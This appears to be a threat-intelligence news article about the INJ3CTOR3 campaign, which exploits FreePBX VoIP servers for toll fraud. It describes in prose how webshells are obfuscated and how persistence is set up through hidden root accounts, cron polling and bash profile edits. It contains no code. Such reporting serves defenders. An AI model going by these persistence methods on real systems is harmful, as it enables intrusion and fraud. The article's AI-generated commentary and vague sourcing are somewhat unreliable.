Listen to this Post

Introduction
A large-scale and highly coordinated cyber exploitation campaign is currently targeting FreePBX VoIP systems worldwide, aiming to enable telecom toll fraud on an industrial level. Security researchers have linked the operation to a financially motivated threat actor known as INJ3CTOR3, active since 2019. The campaign demonstrates a significant evolution in attack sophistication, combining newly discovered PHP-based webshells with established malicious toolsets to maintain persistent access and monetize compromised VoIP infrastructure. With automated exploitation spanning multiple regions and cloud providers, this campaign highlights how vulnerable telephony systems remain a prime target for organized cybercrime groups.
Campaign Summary
The ongoing exploitation campaign against FreePBX infrastructure represents one of the most structured VoIP-focused cybercrime operations observed in recent years. Cyble Research & Intelligence Labs (CRIL) attributes the activity with high confidence to the threat actor INJ3CTOR3, a financially driven group active since 2019 and known for telecom fraud operations. The attackers have introduced a previously undocumented PHP webshell family named JOMANGY, which operates alongside the older ZenharR toolset to maintain system control. Each deployed webshell is not only a remote access tool but also contains embedded VoIP toll fraud logic, allowing attackers to route calls through compromised SIP trunks, effectively billing victims for unauthorized international or premium-rate calls.
Infrastructure analysis revealed a command-and-control system managing an inventory of 3,080 IP addresses, indicating extensive automated scanning and exploitation across global networks. Approximately 39 percent of these nodes are associated with Alibaba Cloud, suggesting heavy reliance on large-scale cloud hosting to distribute malicious infrastructure. Targeted regions include Asia-Pacific, Latin America, and the Middle East, demonstrating a global attack footprint rather than a localized campaign.
Once inside a FreePBX system, the attacker deploys a Bash-based dropper that executes a carefully designed host takeover process. It aggressively removes competing malware, eliminating more than 50 known webshell signatures and blocking at least 11 rival C2 servers. It also cleans up remnants from earlier INJ3CTOR3 operations, effectively migrating infected systems into a newly controlled botnet environment hosted in the Netherlands.
Persistence is achieved through multiple layers of redundancy. The attackers create 18 system accounts, including nine root-level UID-0 accounts disguised to blend into normal system activity and eight service-level accounts sharing identical cryptographic password patterns. The infection also includes a six-layer persistence architecture that ensures system recovery even if part of the malware is removed. This includes cron-based polling mechanisms that retrieve payloads every one to three minutes and modifications to bash profile files that execute malicious code upon login or reboot.
Although the initial infection vector is not definitively confirmed, forensic analysis suggests two likely vulnerabilities in FreePBX systems. One is CVE-2025-64328, a post-authentication command injection flaw in the filestore module. The second is CVE-2025-57819, a pre-authentication SQL injection vulnerability in the Endpoint module. Evidence also shows attackers actively search logs and exploit proof-of-concept code associated with known security research, indicating rapid weaponization of public exploits.
The JOMANGY webshell itself uses multi-layer obfuscation, combining base64 encoding with ROT13 transformation to hide malicious PHP execution chains. The payload structure is frequently rotated, allowing it to bypass traditional signature-based antivirus detection during initial deployment phases. Attribution to INJ3CTOR3 is reinforced by consistent infrastructure overlap, shared operational patterns, and similarities in command-and-control frameworks observed by multiple cybersecurity firms including Fortinet, Palo Alto Networks Unit 42, Check Point Research, and the SANS Internet Storm Center.
What Undercode Say:
This campaign represents a clear evolution in VoIP-targeted cybercrime, shifting from opportunistic exploitation to fully industrialized telecom fraud operations.
The integration of live toll fraud logic directly into webshell payloads shows a merging of intrusion tooling and monetization mechanisms in real time.
Instead of post-compromise exploitation, attackers are now embedding revenue generation directly into initial access tools.
The use of six-layer persistence indicates a strong emphasis on survivability over stealth alone.
Even partial cleanup efforts are unlikely to remove the infection due to redundant recovery mechanisms.
The deliberate eviction of competing malware suggests this is a contested underground ecosystem, not a single-actor environment.
The attackers are effectively monopolizing compromised VoIP infrastructure for financial control.
Cloud abuse, especially through major providers, highlights how legitimate infrastructure is being weaponized at scale.
This also makes attribution and takedown significantly more complex for defenders.
The rotation of payload encoding techniques reduces the effectiveness of static detection systems.
Security tools relying only on signature matching are likely insufficient against this campaign.
Behavior-based detection becomes essential, particularly around SIP trunk anomalies.
The campaign’s geographic spread shows that FreePBX deployments are globally exposed, not regionally isolated.
Use of multiple CVEs suggests parallel exploitation attempts rather than reliance on a single vulnerability.
This increases the likelihood of successful compromise across different patch levels.
The presence of cleanup routines from earlier campaigns shows long-term operational continuity.
This is not a one-off intrusion but part of an evolving botnet lifecycle.
The inclusion of system-level accounts indicates deep privilege escalation success.
Once root access is achieved, attackers maintain near-complete control over telephony routing.
The monetization model is simple but effective: victim pays for fraud traffic.
This creates direct financial damage without requiring data exfiltration.
Telecom infrastructure becomes both the target and the tool of exploitation.
Detection delay significantly increases financial losses in such scenarios.
Incident response must prioritize SIP traffic monitoring and account auditing.
Traditional endpoint security alone is insufficient in this environment.
Network-layer visibility becomes critical for early detection.
Cloud-hosted command infrastructure complicates takedown operations.
The campaign demonstrates strong operational maturity and automation.
It reflects a shift toward scalable cybercrime-as-infrastructure models.
Long-term mitigation will require coordinated vendor and carrier response.
Without it, similar campaigns are likely to persist and expand.
Fact Checker Results
✅ Attribution aligns with multi-vendor cybersecurity reporting and known INJ3CTOR3 activity patterns
⚠️ CVE exploitation claims are plausible but depend on confirmation of active weaponization in the wild
❌ No evidence provided suggests public confirmation of full global compromise scale beyond observed infrastructure indicators
Prediction
INJ3CTOR3 or related groups will likely continue refining automated FreePBX exploitation chains, increasing speed from vulnerability discovery to monetization.
Future variants of JOMANGY may include stronger anti-forensics and faster self-healing mechanisms.
Telecom providers may begin enforcing stricter SIP anomaly detection and authentication hardening.
If unpatched FreePBX deployments remain widespread, similar toll fraud campaigns are expected to expand further in scope and financial impact.
🕵️📝Let’s dive deep and fact‑check.
References:
Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://www.facebook.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube




